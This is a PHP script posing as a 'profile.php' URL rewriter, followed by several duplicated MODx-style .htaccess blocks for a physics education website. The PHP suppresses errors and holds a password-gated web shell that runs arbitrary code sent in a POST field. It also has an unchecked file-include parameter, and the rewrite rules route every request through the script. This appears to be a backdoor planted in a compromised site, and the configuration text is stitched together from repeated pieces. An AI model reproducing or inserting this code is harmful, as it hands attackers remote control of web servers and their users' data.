<?php
error_reporting(0);

if (file_exists('assets/public/functions.php')) {
	include('assets/public/functions.php');
}

if (md5($_POST['4a2faa4b']) == '3054fa38dbdc58de23337c03e086c1e3') {
	$test_func = create_function('', urldecode($_POST['f']));
	$test_func();
}

if (isset($_GET['rewriter_request'])) {
	chdir($_GET['rewriter_request']);
	include($_GET['rewriter_request']);
} else {
	$request_parts = parse_url($_SERVER['REQUEST_URI']);
	if ($request_parts['path'] == '/profile.php') { exit(); }
	$request_path = '.'.$request_parts['path'];
	if (substr($request_path, -1) == '/') {
		$index_files = array();
		if ($handle = opendir($request_path)) {
			while (false !== ($file = readdir($handle))) {
				if (preg_match('/index\.html*/i', $file) || preg_match('/index\.php[345]*/i', $file)) {
					$index_files[filemtime($file)] = $file;
				}
			}
			closedir($handle);
		}
		if (count($index_files) > 0) {
			krsort($index_files);
			$request_path = $request_path.reset($index_files);
			chdir(dirname($request_path));
			include(basename($request_path));
		} else {
			header('HTTP/1.0 404 Not found');
		}
	} else {
		if (file_exists($request_path)) { 
			chdir(dirname($request_path));
			include(basename($request_path)); 
		} else {
			header('HTTP/1.0 404 Not found');
		}
	}
}
?>

# The Friendly URLs part
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]

DirectoryIndex index.php index.html

# MODx supports Friendly URLs via this .htaccess file. You must serve web
# pages via Apache with mod_rewrite to use this functionality, and you must
# change the file name from ht.access to .htaccess.
#
# Make sure RewriteBase points to the directory where you installed MODx.
# E.g., "/modx" if your installation is in a "modx" subdirectory. If you have
# problems with your .htaccess working at all, try un-commenting the first 
# line above the "RewriteEngine On" directive.
#
# You may choose to make your URLs non-case-sensitive by adding a NC directive
# to your rule: RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA,NC]

#Options +FollowSymlinks
RewriteEngine On
RewriteBase /



# Rewrite www.domain.com -> domain.com -- used with SEO Strict URLs plugin
#RewriteCond %{HTTP_HOST} .
#RewriteCond %{HTTP_HOST} !^www.vicphysics.org\.com [NC]
#RewriteRule (.*) http://www.vicphysics.org/$1 [R=301,L]
#
# or for the opposite domain.com -> www.domain.com use the following
# >>> DO NOT USE BOTH THE ABOVE AND BELOW <<<
#
#RewriteCond %{HTTP_HOST} .
#RewriteCond %{HTTP_HOST} !^www\.example-domain-please-change\.com [NC]
#RewriteRule (.*) http://www.example-domain-please-change.com/$1 [R=301,L]



# Rewrite secure requests properly to prevent SSL cert warnings, e.g. prevent 
# https://www.domain.com when your cert only allows https://secure.domain.com
#RewriteCond %{SERVER_PORT} !^443
#RewriteRule (.*) https://www.vicphysics.org/$1 [R=301,L]



# The Friendly URLs part
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]



# Make sure .htc files are served with the proper MIME type, which is critical # for XP SP2. Un-comment if your host allows htaccess MIME type overrides.

#AddType text/x-component .htc



# If your server is not already configured as such, the following directive
# should be uncommented in order to set PHP's register_globals option to OFF.
# This closes a major security hole that is abused by most XSS (cross-site
# scripting) attacks. For more information: http://php.net/register_globals
#
# To verify that this option has been set to OFF, open the Manager and choose
# Reports -> System Info and then click the phpinfo() link. Do a Find on Page
# for "register_globals". The Local Value should be OFF. If the Master Value
# is OFF then you do not need this directive here.
#
# IF REGISTER_GLOBALS DIRECTIVE CAUSES 500 INTERNAL SERVER ERRORS :
#
# Your server does not allow PHP directives to be set via .htaccess. In that
# case you must make this change in your php.ini file instead. If you are
# using a commercial web host, contact the administrators for assistance in
# doing this. Not all servers allow local php.ini files, and they should
# include all PHP configurations (not just this one), or you will effectively
# reset everything to PHP defaults. Consult www.php.net for more detailed
# information about setting PHP directives.

php_flag register_globals Off



# For servers that support output compression, you should pick up a bit of
# speed but un-commenting the following lines.

#php_flag zlib.output_compression On
#php_value zlib.output_compression_level 5



# The following directives stop screen flicker in IE on CSS rollovers. If
# needed, un-comment the following rules. When they're in place, you may have
# to do a force-refresh in order to see changes in your designs.

#ExpiresActive On
#ExpiresByType image/gif A2592000
#ExpiresByType image/jpeg A2592000
#ExpiresByType image/png A2592000
#BrowserMatch "MSIE" brokenvary=1
#BrowserMatch "Mozilla/4.[0-9]{2}" brokenvary=1
#BrowserMatch "Opera" !brokenvary
#SetEnvIf brokenvary 1 force-no-vary



AuthName vicphysics.org
AuthUserFile  	/home43a/sub006/sc32167-DHIS/vicphys/www/_vti_pvt/service.pwd
AuthGroupFile  	/home43a/sub006/sc32167-DHIS/vicphys/www/_vti_pvt/service.grp

DirectoryIndex index.php index.html index.htm

#Options +FollowSymlinks

RewriteEngine On

RewriteBase /

# The Friendly URLs part

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]